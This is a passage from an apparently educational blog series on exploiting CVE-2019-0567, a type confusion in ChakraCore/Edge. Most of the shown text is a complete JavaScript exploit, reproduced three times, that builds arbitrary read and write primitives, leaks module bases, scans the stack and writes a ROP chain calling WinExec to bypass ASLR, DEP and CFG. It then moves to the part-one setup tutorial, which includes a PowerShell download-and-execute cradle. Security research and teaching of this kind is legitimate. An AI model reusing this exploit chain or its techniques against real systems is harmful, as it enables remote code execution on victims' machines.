    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)
    {

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
        {
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[0]+counter) + hex(stackLeak[1]));

            // Break out of the loop
            break;
        }

        // Increment the counter if we didn't find our target return address
        counter += 0x8;
    }

    // Begin ROP chain
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x636c6163, 0x00000000);            // calc
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e6c6, chakraHigh);      // 0x18003e6c6: pop rcx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x1c77000, chakraHigh);    // Empty address in .data of chakracore.dll
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0xd7ff7, chakraHigh);      // 0x1800d7ff7: mov qword [rcx], rax ; ret
    counter+=0x8;

    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;

}

main();

You’ll notice the address we are placing in RCX, via pop rcx, is “an empty address in .data of chakracore.dll”. The .data section of any PE is generally readable and writable. This gives us the proper permissions needed to write calc into the pointer. To find this address, we can look at the .data section of chakracore.dll in WinDbg with the !dh command.

Let’s open our exploit.js in WinDbg again via ch.exe and WinDbg and set a breakpoint on our first ROP gadget (located at chakracore_base + 0x3e876) to step through execution.

Looking at the stack, we can see we are currently executing our ROP chain.

Our first ROP gadget, pop rax, will place calc (in hex representation) into the RAX register.

After execution, we can see the ret from our ROP gadget takes us right to our next gadget - pop rcx, which will place the empty .data pointer from chakracore.dll into RCX.

This brings us to our next ROP gadget, the mov qword ptr [rcx], rax ; ret gadget.

After execution of the ROP gadget, we can see the .data pointer now contains the contents of calc - meaning we now have a pointer we can place in RCX (it technically is already in RCX) as the lpCmdLine parameter.

Now that the first parameter is done - we only have two more steps left. The first is the second parameter, uCmdShow (which just needs to be set to 0). The last gadget will pop the address of kernel32!WinExec. Here is how this part of the ROP chain will look.

pop rdx ; ret
<0 as the second parameter> (placed into RDX)

pop rax ; ret
<WinExec address> (placed into RAX)

jmp rax (call kernel32!WinExec)

The above gadgets will fill RDX with our last parameter, and then place WinExec into RAX. Here is how we update our final script.

    (...)truncated(...)

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)
    {

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
        {
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[0]+counter) + hex(stackLeak[1]));

            // Break out of the loop
            break;
        }

        // Increment the counter if we didn't find our target return address
        counter += 0x8;
    }

    // Begin ROP chain
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x636c6163, 0x00000000);            // calc
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e6c6, chakraHigh);      // 0x18003e6c6: pop rcx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x1c77000, chakraHigh);    // Empty address in .data of chakracore.dll
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0xd7ff7, chakraHigh);      // 0x1800d7ff7: mov qword [rcx], rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x40802, chakraHigh);      // 0x1800d7ff7: pop rdx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x00000000, 0x00000000);            // 0
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], kernel32Lo+0x5e330, kernel32High);  // KERNEL32!WinExec address
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x7be3e, chakraHigh);      // 0x18003e876: jmp rax
    counter+=0x8;

    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x41414141, 0x41414141);
    counter+=0x8;
}

main();

Before execution, we can find the address of kernel32!WinExec by computing the offset in WinDbg.

Let’s again run our exploit in WinDbg and set a breakpoint on the pop rdx ROP gadget (located at chakracore_base + 0x40802)

After the pop rdx gadget is hit, we can see 0 is placed in RDX.

Execution then redirects to the pop rax gadget.

We then place kernel32!WinExec into RAX and execute the jmp rax gadget to jump into the WinExec function call. We can also see our parameters are correct (RCX points to calc and RDX is 0.

We can now see everything is in order. Let’s close our of WinDbg and execute our final exploit without any debugger. The final code can be seen below.

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    print("[+] DataView object 2 leaked vtable from ChakraCore.dll: 0x" + hex(vtableHigh) + hex(vtableLo));

    // Store the base of chakracore.dll
    chakraLo = vtableLo - 0x1961298;
    chakraHigh = vtableHigh;

    // Print update
    print("[+] ChakraCore.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));

    // Leak a pointer to kernel32.dll from from ChakraCore's IAT (for who's base address we already have)
    iatEntry = read64(chakraLo+0x17c0000+0x40, chakraHigh);     // KERNEL32!RaiseExceptionStub pointer

    // Store the upper part of kernel32.dll
    kernel32High = iatEntry[1];

    // Store the lower part of kernel32.dll
    kernel32Lo = iatEntry[0] - 0x1d890;

    // Print update
    print("[+] kernel32.dll base address: 0x" + hex(kernel32High) + hex(kernel32Lo));

    // Leak type->javascriptLibrary (lcoated at type+0x8)
    javascriptLibrary = read64(typeLo+0x8, typeHigh);

    // Leak type->javascriptLibrary->scriptContext (located at javascriptLibrary+0x450)
    scriptContext = read64(javascriptLibrary[0]+0x450, javascriptLibrary[1]);

    // Leak type->javascripLibrary->scriptContext->threadContext
    threadContext = read64(scriptContext[0]+0x3b8, scriptContext[1]);

    // Leak type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread (located at threadContext+0xc8)
    stackAddress = read64(threadContext[0]+0xc8, threadContext[1]);

    // Print update
    print("[+] Leaked stack from type->javascriptLibrary->scriptContext->threadContext->stackLimitForCurrentThread!");
    print("[+] Stack leak: 0x" + hex(stackAddress[1]) + hex(stackAddress[0]));

    // Compute the stack limit for the current thread and store it in an array
    var stackLeak = new Uint32Array(0x10);
    stackLeak[0] = stackAddress[0] + 0xed000;
    stackLeak[1] = stackAddress[1];

    // Print update
    print("[+] Stack limit: 0x" + hex(stackLeak[1]) + hex(stackLeak[0]));

    // Scan the stack

    // Counter variable
    let counter = 0;

    // Store our target return address
    var retAddr = new Uint32Array(0x10);
    retAddr[0] = chakraLo + 0x1768bc0;
    retAddr[1] = chakraHigh;

    // Loop until we find our target address
    while (true)
    {

        // Store the contents of the stack
        tempContents = read64(stackLeak[0]+counter, stackLeak[1]);

        // Did we find our return address?
        if ((tempContents[0] == retAddr[0]) && (tempContents[1] == retAddr[1]))
        {
            // print update
            print("[+] Found the target return address on the stack!");

            // stackLeak+counter will now contain the stack address which contains the target return address
            // We want to use our arbitrary write primitive to overwrite this stack address with our own value
            print("[+] Target return address: 0x" + hex(stackLeak[0]+counter) + hex(stackLeak[1]));

            // Break out of the loop
            break;
        }

        // Increment the counter if we didn't find our target return address
        counter += 0x8;
    }

    // Begin ROP chain
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x636c6163, 0x00000000);            // calc
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e6c6, chakraHigh);      // 0x18003e6c6: pop rcx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x1c77000, chakraHigh);    // Empty address in .data of chakracore.dll
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0xd7ff7, chakraHigh);      // 0x1800d7ff7: mov qword [rcx], rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x40802, chakraHigh);      // 0x1800d7ff7: pop rdx ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], 0x00000000, 0x00000000);            // 0
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x3e876, chakraHigh);      // 0x18003e876: pop rax ; ret
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], kernel32Lo+0x5e330, kernel32High);  // KERNEL32!WinExec address
    counter+=0x8;
    write64(stackLeak[0]+counter, stackLeak[1], chakraLo+0x7be3e, chakraHigh);      // 0x18003e876: jmp rax
    counter+=0x8;
}

main();

As we can see, we achieved code execution via type confusion while bypassing ASLR, DEP, and CFG!

Conclusion

As we saw in part two, we took our proof-of-concept crash exploit to a working exploit to gain code execution while avoiding exploit mitigations like ASLR, DEP, and Control Flow Guard. However, we are only executing our exploit in the ChakraCore shell environment. When we port our exploit to Edge in part three, we will need to use several ROP chains (upwards of 11 ROP chains) to get around Arbitrary Code Guard (ACG).

I will see you in part three! Until then.

Peace, love, and positivity :-)

Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 1)

Introduction

Browser exploitation - it has been the bane of my existence for quite some time now. A while ago, I did a write-up on a very trivial use-after-free vulnerability in an older version of Internet Explorer. This left me longing for more, as ASLR for instance was non-issue. Also, use-after-free bugs within the DOM have practically been mitigated with the advent of MemGC. Additional mitigations, such as Control Flow Guard (CFG), were also not present.

In the name of understanding more modern browser exploitation (specifically Windows-based exploitation), I searched and scoured the internet for resources. I constantly picked the topic up, only to set it down again. I simply just “didn’t get it”. This was for a variety of factors, including browser exploitation being a very complex issue, with research on the topic being distributed accordingly. I’ve done my fair share of tinkering in the kernel, but browsers were a different beast for me.

Additionally, I found almost no resources that went from start to finish on more “modern” exploits, such as attacking Just-In-Time (JIT) compilers specifically on Windows systems. Not only that, almost all resources available online target Linux operating systems. This is fine, from a browser primitive perspective. However, when it comes to things like exploit controls such as CFG, to actual exploitation primitives, this can be highly dependent on the OS. As someone who focuses exclusively on Windows, this led to additional headache and disappointment.

I recently stumbled across two resources: the first being a Google Project Zero issue for the vulnerability we will be exploiting in this post, CVE-2019-0567. Additionally, I found an awesome writeup on a “sister” vulnerability to CVE-2019-0539 (which was also reported by Project Zero) by Perception Point.

The Perception Point blog post was a great read, but I felt it was more targeted at folks who already have fairly decent familiarity with exploit primitives in the browser. There is absolutely nothing wrong with this, and I think this is still makes for an excellent blog post that I would highly recommend reading if you’ve done any kind of browser vulnerability research before. However, for someone in my shoes that has never touched JIT compiler vulnerability research in the browser space, there was a lack of knowledge I had to make up for, not least because the post actually just ended on achieving the read/write primitive and left code execution to the reader.

There is also other prerequisite knowledge needed, such as why does JIT compilation even present an attack surface in the first place? How are JavaScript objects laid out in memory? Since JavaScript values are usually 32-bit, how can that be leveraged for 64-bit exploitation? How do we actually gain code execution after obtaining a read/write primitive with DEP, ASLR, CFG, Arbitrary Code Guard (ACG), no child processes, and many other mitigations in Edge involved? These are all questions I needed answers to. To share how I went about addressing these questions, and for those also looking to get into browser exploitation, I am releasing a three part blog series on browser exploitation.

Part one (this blog) will go as follows:

  1. Configuring and building up a browser exploitation environment
  2. Understanding JavaScript objects and their layout in memory (ChakraCore/Chakra)
  3. CVE-2019-0567 root cause analysis and attempting to demystify type confusion bugs in JIT compilers

Part two will include:

  1. Going from crash to exploit (and dealing with ASLR, DEP, and CFG along the way) in ChakraCore
  2. Code execution

Part three, lastly, will deconstruct the following topics:

  1. Porting the exploit to Microsoft Edge (Chakra-based Edge)
  2. Bypassing ACG, using a now-patched CVE
  3. Code execution in Edge

There are also a few limitations you should be aware of as well:

  1. In this blog series we will have to bypass ACG. The bypass we will be using has been mitigated as of Windows 10 RS4.
  2. I am also aware of Intel Control-Flow Enforcement Technology (CET), which is a mitigation that now exists (although it has yet to achieve widespread adoption). The version of Edge we are targeting doesn’t have CET.
  3. Our initial analysis will be done with the ch.exe application, which is the ChakraCore shell. This is essentially a command-line JavaScript engine that can directly execute JavaScript (just as a browser does). Think of this as the “rendering” part of the browser, but without the graphics. Whatever can occur in ch.exe can occur in Edge itself (Chakra-based Edge). Our final exploit, as we will see in part three, will be detonated in Edge itself. However, ch.exe is a very powerful and useful debugging tool.
  4. Chakra, and the open-source twin ChakraCore, are both deprecated in their use with Microsoft Edge. Edge now runs on the V8 JavaScript engine, which is used by Chrome-based browsers.

Finally, from an exploitation perspective, none of what I am doing would have been possible without Bruno Keith’s amazing prior work surrounding Chakra exploit primitives, the Project Zero issues, or the Perception Point blog post.

Configuring a Chakra/ChakraCore Environment

Before beginning, Chakra is the name of the “Microsoft proprietary” JavaScript engine used with Edge before V8. The “open-source” variant is known as ChakraCore. We will reference ChakraCore for this blog post, as the source code is available. CVE-2019-0567 affects both “versions”, and at the end we will also port our exploit to actually target Chakra/Edge (we will be doing analysis in ChakraCore).

For the purposes of this blog post, and part two, we will be performing analysis (and exploitation in part two) with the open-source version of Chakra, the ChakraCore JavaScript engine + ch.exe shell. In part three, we will perform exploitation with the standard Microsoft Edge (pre-V8 JavaScript engine) browser and Chakra JavaScript engine

So we can knock out “two birds with one stone”, our environment needs to first contain a pre-V8 version of Edge, as well as a version of Edge that doesn’t have the patch applied for CVE-2019-0567 (the type confusion vulnerability) or CVE-2017-8637 (our ACG bypass primitive). Looking at the Microsoft advisory for CVE-2019-0567, we can see that the applicable patch is KB4480961. The CVE-2017-8637 advisory can be found here. The applicable patch in this case is KB4034674.

The second “bird” we need to address is dealing with ChakraCore.

Windows 10 1703 64-bit is a version of Windows that not only can support ChakraCore, but also comes (by default) with a pre-patched version of Edge via a clean installation. So, for the purposes of this blog post, the first thing we need to do is grab a version of Windows 10 1703 (unpatched with no service packs) and install it in a virtual machine. You will probably want to disable automatic updates, as well. How this version of Windows is obtained is entirely up to the reader.

If you cannot obtain a version of Windows 10 1703, another option is to just not worry about Edge or a specific version of Windows. We will be using ch.exe, the ChakraCore shell, along with the ChakraCore engine to perform vulnerability analysis and exploit development. In part two, our exploit will be done with ch.exe. Part three is entirely dedicated to Microsoft Edge. If installation of Edge proves to be too much of a hassle, the “gritty” details about the exploit development process will be in part two. Do be warned, however, that Edge contains a few more mitigations that make exploitation much more arduous. Because of this, I highly recommend you get your hands on the applicable image to follow along with all three posts. However, the exploit primitives are identical between a ch.exe environment and an Edge environment.

After installing a Windows 10 1703 virtual machine (I highly recommend making the hard drive 100GB at least), the next step for us will be installing ChakraCore. First, we need to install git on our Windows machine. This can be done most easily by quickly installing Scoop.sh via PowerShell and then using a PowerShell web cradle to execute scoop install git from the PowerShell prompt. To do this, first run PowerShell as an administrator and then execute the following commands:

  1. Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser (then enter a to say “Yes to All”)
  2. [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
  3. Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://get.scoop.sh')
  4. scoop install git

After git is installed, you will need to also download Microsoft Visual Studio. Visual Studio 2017 works just fine and I have included a direct download link from Microsoft here. After downloading, just configure Visual Studio to install Desktop development with C++ and all corresponding defaults.

After git and Visual Studio are installed, we can go ahead and install ChakraCore. ChakraCore is a full fledged JavaScript environment with a runtime, etc. so it is quite hefty and may take a few seconds when cloning the repository. Open up a cmd.exe prompt and execute the following commands:

  1. cd C:\Wherever\you\want\to\install
  2. git clone https://github.com/Microsoft/ChakraCore.git
  3. cd ChakraCore
  4. git checkout 331aa3931ab69ca2bd64f7e020165e693b8030b5 (this is the commit hash associated with the vulnerability)

After ChakraCore is downloaded, and the vulnerable commit “checked out”, we need to configure ChakraCore to compile with Control Flow Guard (CFG). To do this, go to the ChakraCore folder and open the Build directory. In there, you will see a Visual Studio Solution file. Double-click and select “Visual Studio 2017” (this is not a “required” step, but we want to add CFG as a mitigation we have to eventually bypass!).

Note that when Visual Studio opens it will want you to sign in with an account. You can bypass this by telling Visual Studio you will do it later, and you will then get 30 days of unfettered access.

At the top of the Visual Studio window, select x64 as such. Make sure to leave Debug as is.

After selecting x64, click Project > Properties in Visual Studio to configure ChakraCore properties. From here, we want to select C/C++ > All Options and turn on Control Flow Guard. Then, press Apply then Ok.

Click File > Save All in Visual Studio to save all of our changes to the solution.

We now need to open up a x64 Native Tools Command Prompt for VS 2017 prompt. To do this, hit the Windows key and start typing in x64 Native Tools Command.

Lastly, we need to actually build the project by executing the following the command: msbuild /m /p:Platform=x64 /p:Configuration=Debug Build\Chakra.Core.sln (note that if you do not use a x64 Native Tools Command Prompt for VS 2017 prompt, msbuild won’t be a valid command).

These steps should have installed ChakraCore on your machine. We can validate this by opening up a new cmd.exe prompt and executing the following commands:

  1. cd C:\path\to\ChakraCore
  2. cd Build\VcBuild\bin\x64_debug\
  3. ch.exe --version

We can clearly see that the ChakraCore shell is working, and the ChakraCore engine (chakracore.dll) is present! Now that we have Edge and ChakraCore installed, we can begin our analysis by examining how JavaScript objects are laid out in memory within Chakra/ChakraCore and then exploitation!

JavaScript Objects - Chakra/ChakraCore Edition

The first key to understanding modern vulnerabilities, such as type confusion, is understanding how JavaScript objects are laid out in memory. As we know, in a programming language like C, explicit data types are present. int var and char* string are two examples - the first being an integer and the second being an array of characters, or chars. However, in ChakraCore, objects can be declared as such: var a = {o: 1, b: 2} or a = "Testing". How does JavaScript know how to treat/represent a given object in memory when there is no explicit data type information? This is the job of ChakraCore - to determine the type of object being used and how to update and manage it accordingly.

All the information I am providing, about JavaScript objects, is from this blog, written by a developer of Chakra. While the linked blog focuses on both “static” and “dynamic” objects, we will be focusing on specifically how ChakraCore manages dynamic objects, as static objects are pretty straight forward and are uninteresting for our purposes.

So firstly, what is a dynamic object? A dynamic object is pretty much any object that can’t be represented by a “static” object (static objects consists of data types like numbers, strings, and booleans). For example, the following would be represented in ChakraCore as a dynamic object:

let dynamicObject = {a: 1, b:2};
dynamicObject.a = 2;			// Updating property a to the value of 2 (previously it was 1)
dynamicObject.c = "string";		// Adding a property called c, which is a string

print(dynamicObject.a);			// Print property a (to print, ChakraCore needs to retrieve this property from the object)
print(dynamicObject.c);			// Print property c (to print, ChakraCore needs to retrieve this property from the object)

You can see why this is treated as a dynamic object, instead of a static one. Not only are two data types involved (property a is a number and property c is a string), but they are stored as properties (think of C-structures) in the object. There is no way to account for every combination of properties and data types, so ChakraCore provides a way to “dynamically” handle these situations as they arise (a la “dynamic objects”).

ChakraCore has to treat these objects different then, say, a simple let a = 1 static object. This “treatment” and representation, in memory, of a dynamic object is exactly what we will focus on now. Having said all of that - exactly how does this layout look? Let’s cite some examples below to find out.

Here is the JavaScript code we will use to view the layout in the debugger:

print("DEBUG");
let a = {b: 1, c: 2};

What we will do here is save the above code in a script called test.js and set a breakpoint on the function ch!WScriptJsrt::EchoCallback within ch.exe. The EchoCallback function is responsible for print() operations, meaning this is synonymous with setting a breakpoint in ch.exe to break every time print() is called (yes, we are using this print statement to aid in debugging). After setting the breakpoint, we can resume execution and break on EchoCallback.

Now that we have hit our breakpoint, we know that anything that happens after this point should involve the JavaScript code after the print() statement from test.js. The reason we do this is because the next function we are going to inspect is constantly called in the background, and we want to ensure we are just checking the specific function call (coming up next) that corresponds to our object creation, to examine it in memory.

Now that we have reached the EchoCallback breakpoint, we need to now set a breakpoint on chakracore!Js::DynamicTypeHandler::SetSlotUnchecked. Note that chakracore.dll isn’t loaded into the process space upon ch.exe executing, and is only loaded after our previous execution.

Once we hit chakracore!Js::DynamicTypeHandler::SetSlotUnchecked, we can finally start examining our object. Since we built ChakraCore locally, as well, we have access to the source code. Both WinDbg and WinDbg Preview should populate the source upon execution on this function.

This code may look a bit confusing. That is perfectly okay! Just know this function is responsible for filling out dynamic objects with their needed property values (in this case, values provided by us in test.js via a.b and a.c).

Right now the object we are dealing with is in the RCX register (per __fastcall we know RCX is the DynamicObject * instance parameter in the source code). This can be seen in the next image below. Since the function hasn’t executed yet, this value in RCX is currently just a blank “skeleton” a object waiting to be filled.

We know that we are setting two values in the object a, so we need to execute this function twice. To do this, let’s first preserve RCX in the debugger and then execute g once in WinDbg, which will set the first value, and then we will execute the function again, but this time with the command pt to break before the function returns, so we can examine the object contents.

Perfect. After executing our function twice, but just before the function returns, let’s inspect the contents of what was previously held in RCX (our a object).

